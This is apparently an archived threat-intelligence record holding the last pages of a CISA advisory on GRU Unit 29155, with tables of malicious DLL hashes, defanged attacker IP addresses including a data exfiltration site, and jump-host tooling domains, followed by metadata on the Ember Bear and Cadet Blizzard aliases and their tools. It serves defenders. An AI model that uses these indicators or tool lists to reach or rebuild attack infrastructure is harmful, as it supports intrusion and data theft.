332b7f6662e28e3577bd1b269904b940\r\nPoezcjhvkzgmnyqljpbte.dll 32db8abce1618e60441f5c7cf4be0d22 2b2509c6ee46d6327f2f1c9a75122d15\r\nRvyqctymumtudroyae.dll dd2431b1f858b4ca14a4ea05fb8c4a06 9b2924c727aa3a061906321a66c9050c\r\nSutragevr.dll 7d3b529db1bd896d9fd877b85cafdc64 de276cf07ccffa18d7ffc35281bca910\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a\r\nPage 18 of 20\n\nFilename MD5 (Reversed) MD5 (Functional)\r\nSxkdxclqmxnmjgedhgagl.dll 6e1394938c2fecad2d4f5b3bcf357ec0 d6b41747cb035c4c2b08790cd57f0626\r\nTosyxesxgrzyb.dll 99305ce01cc2d0f58cd226efb2de893f 6859fe5a3eead00a563cd93efcc6ea96\r\nTpmnkauftdydomyz.dll 6c152774f6894407075e6f0a2859bbae 981160dee6cd25fb181e54eca7ff7c22\r\nTptjtwfhpsjfksqoajt.dll 343b140977b3f9b227e7e5f82b0fadb5 95cf2a5a24b0d33d621bb8995d5826bc\r\nTsgblplhdwwj.dll 54a9fa9eb337a3b5ca7b0fa4553e439d cee5acbfef7e76f52f40b8ae95199c50\r\nUqhznlcagzyoqrbyylnnwn.dll 4c19aeecbfca13b8a199703d8b8284b9 ad0ca738aa6c987e4ee1a87ff2b8acd5\r\nUslrfkxccdyetfdxmaokbhv.dll dc795cb9290b1bc0b7fb1ce9d6ae7c93 552d9b79cc544fc6c3e8aa204dd00811\r\nWaordspinycera.dll 9935a86108e3ae3f72cd15817601dcc6 5d063eecd894d3d523875bc82ef6f319\r\nWcfsobntsczz.dll 77aa3f342a0d69fda67c853bcc004d48 d0b00a6c83ce810ec2763af17e8ab1c4\r\nWpqyhvfnunlabx.dll 03af632aa6f87bf9dd4364ee3b612cbb 9f11e915be5c0d02a3130329cf032a28\r\nWqwpawlulyrsrjcbvuvddeud.dll 41871fef433d7b4b89fd226fe3a1a2c0 e21fe98cc8866c0eeecf3549ebcec751\r\nWqxpgvsgvhygmfbziucxcuh.dll 246d9f9831b125ea7e6ef21bc4c8a0ca dea3ae8225913dd98148fc86cfc3bcbe\r\nXgcpgrxhchgwz.dll 9c695be3703194fdb71c212a0832bcf3 8744cec7547b1e73705c10a264e28e08\r\nXgkepoc.dll 69e58c5ee69f5e5e8a58f4afdd59adfe d43446b4a22a597b93b559821ee5ac9b\r\nXlfthpiq.dll 540ee8e39150c539fea582b0e77be7b0 3fe96ff4a5ef0f5346ce645a2a893597\r\nXlocky.dll 0a2affa6d895baab087b84e93145da35 246f31c86bbbe7f65c0126cf4a1a947a\r\nXqblktvxmnxrzwiuqdfxzrd.dll 569c1d31f4c7ec7701d8e4e51b59fe85 5eaa7e812733a5c8cda734fab2f752d5\r\nXykqrksoqqgyuckfc.dll 09a2d85e809d36bff82bd5ab773980a3 96964aed18f65a7acae632f358a093f6\r\nYawyjonk.dll 3ccf799ff208981349cee4fb1a1cf88c 4e9c55c6fe25d61ca4394de794546fab\r\nYrknbt.dll 6154760e602bd71192d93f72fbdb486e 94bf96b76c2a092de8962496ce35deaf\r\nYvbmuigfihprdxgiirp.dll b0d0a23766fa64ece9315f37b28bb4c0 1e22d64f263e8ea4b2d37dcd9b7c3012\r\nYwrovtjimixpmizuln.dll ca43a241042b5fcc305393765ae18e69 28d571ddb5c04d065dfe1be9604663ba\r\nZfgdccnwnee.dll 251f3a4757d9e4de0499cc30c0bc00a9 755dac7edd17fbf5b5c449dd06c02e14\r\nZkuxhxwbvifejn.dll 9d7ab8b0aa669125d9a5adc4f46c56f3 af277ae0fbf6cc20f887696ea4756d46\r\nZsdflpivel.dll a9c9c0be8eca3b575c24da0fcf1af1a9 1cac5c0cb8801e8730447023270d8d56\r\nAppendix B: Indicators of Compromise\r\nTable 27 lists observed IP addresses that were first observed as early as 2022 and have been historically linked to Unit\r\n29155 infrastructure. These IPs are considered historical infrastructure and should be investigated for associated abnormal or\r\nmalicious activity.\r\nTable 27: IP Addresses Associated with Unit 29155 Infrastructure\r\nIP Address\r\n5.226.139[.]66\r\n45.141.87[.]11\r\n46.101.242[.]222\r\n62.173.140[.]223\r\n79.124.8[.]66\r\n90.131.156[.]107\r\n112.51.253[.]153\r\n112.132.218[.]45\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a\r\nPage 19 of 20\n\nIP Address\r\n154.21.20[.]82\r\n179.43.133[.]202\r\n179.43.142[.]42\r\n179.43.162[.]55\r\n179.43.175[.]38\r\n179.43.175[.]108 (data exfiltration site)\r\n179.43.176[.]60\r\n179.43.187[.]47\r\n179.43.189[.]218\r\n185.245.84[.]227\r\n185.245.85[.]251\r\n194.26.29[.]84\r\n194.26.29[.]95\r\n194.26.29[.]98\r\n194.26.29[.]251\r\nThreat actors can exploit jump hosts, also known as jump servers or bastion hosts, to gain unauthorized access or perform\r\nmalicious activities within a protected network. In this context, the domains listed in Table 28 represent the tools used to\r\nestablish functionality for creating a jump host.\r\nTable 28: Domains Hosting Jump Host Tooling\r\nDomain Name\r\ninterlinks[.]top\r\nhttps://3proxy[.]ru\r\nhttps://ngrok[.]com (Note: This domain is a legitimate service leveraged for malicious purposes by Unit 29155 cyber\r\nactors and should be investigated prior to blocking.)\r\nhttps://nssm[.]cc\r\nSource: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a\r\nPage 20 of 20", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "origins": [ "web" ], "references": [ "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a" ], "report_names": [ "aa24-249a" ], "threat_actors": [ { "id": "eecf54a2-2deb-41e5-9857-fed94a53f858", "created_at": "2023-01-06T13:46:39.349959Z", "updated_at": "2026-04-10T02:00:03.296196Z", "deleted_at": null, "main_name": "SaintBear", "aliases": [ "Bleeding Bear", "Cadet Blizzard", "Nascent Ursa", "Nodaria", "Storm-0587", "DEV-0587", "Saint Bear", "EMBER BEAR", "UNC2589", "TA471", "UAC-0056", "FROZENVISTA", "Lorec53", "Lorec Bear" ], "source_name": "MISPGALAXY:SaintBear", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "c28760b2-5ec6-42ad-852f-be00372a7ce4", "created_at": "2022-10-27T08:27:13.172734Z", "updated_at": "2026-04-10T02:00:05.279557Z", "deleted_at": null, "main_name": "Ember Bear", "aliases": [ "Ember Bear", "UNC2589", "Bleeding Bear", "DEV-0586", "Cadet Blizzard", "Frozenvista", "UAC-0056" ], "source_name": "MITRE:Ember Bear", "tools": [ "P.A.S. Webshell", "CrackMapExec", "ngrok", "reGeorg", "WhisperGate", "Saint Bot", "PsExec", "Rclone", "Impacket" ], "source_id": "MITRE", "reports": null }, { "id": "03a6f362-cbab-4ce9-925d-306b8c937bf1", "created_at": "2024-11-01T02:00:52.635907Z", "updated_at": "2026-04-10T02:00:05.339384Z", "deleted_at": null, "main_name": "Saint Bear", "aliases": [ "Saint Bear", "Storm-0587", "TA471", "UAC-0056", "Lorec53" ], "source_name": "MITRE:Saint Bear", "tools": [ "OutSteel", "Saint Bot" ], "source_id": "MITRE", "reports": null }, { "id": "bdbf873a-048d-4c5d-9d92-922327cc83a8", "created_at": "2023-01-06T13:46:39.387696Z", "updated_at": "2026-04-10T02:00:03.310459Z", "deleted_at": null, "main_name": "DEV-0586", "aliases": [ "Ruinous Ursa", "Cadet Blizzard" ], "source_name": "MISPGALAXY:DEV-0586", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "025b7171-98f8-4391-adc2-66333629c715", "created_at": "2023-06-23T02:04:34.120175Z", "updated_at": "2026-04-10T02:00:04.599019Z", "deleted_at": null, "main_name": "Cadet Blizzard", "aliases": [ "DEV-0586", "Operation Bleeding Bear", "Ruinous Ursa" ], "source_name": "ETDA:Cadet Blizzard", "tools": [ "GO Simple Tunnel", "GOST", "Impacket", "LOLBAS", "LOLBins", "Living off the Land", "P0wnyshell", "PAYWIPE", "Ponyshell", "Pownyshell", "WhisperGate", "WhisperKill", "netcat", "reGeorg" ], "source_id": "ETDA", "reports": null }, { "id": "083d63b2-3eee-42a8-b1bd-54e657a229e8", "created_at": "2022-10-25T16:07:24.143338Z", "updated_at": "2026-04-10T02:00:04.879634Z", "deleted_at": null, "main_name": "SaintBear", "aliases": [ "Ember Bear", "FROZENVISTA", "G1003", "Lorec53", "Nascent Ursa", "Nodaria", "SaintBear", "Storm-0587", "TA471", "UAC-0056", "UNC2589" ], "source_name": "ETDA:SaintBear", "tools": [ "Agentemis", "Cobalt Strike", "CobaltStrike", "Elephant Client", "Elephant Implant", "GraphSteel", "Graphiron", "GrimPlant", "OutSteel", "Saint Bot", "SaintBot", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434059, "ts_updated_at": 1775826714, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/09390340ca758f19c77c734684bb4670b3a5c0ae.pdf", "text": "https://archive.orkl.eu/09390340ca758f19c77c734684bb4670b3a5c0ae.txt", "img": "https://archive.orkl.eu/09390340ca758f19c77c734684bb4670b3a5c0ae.jpg" } }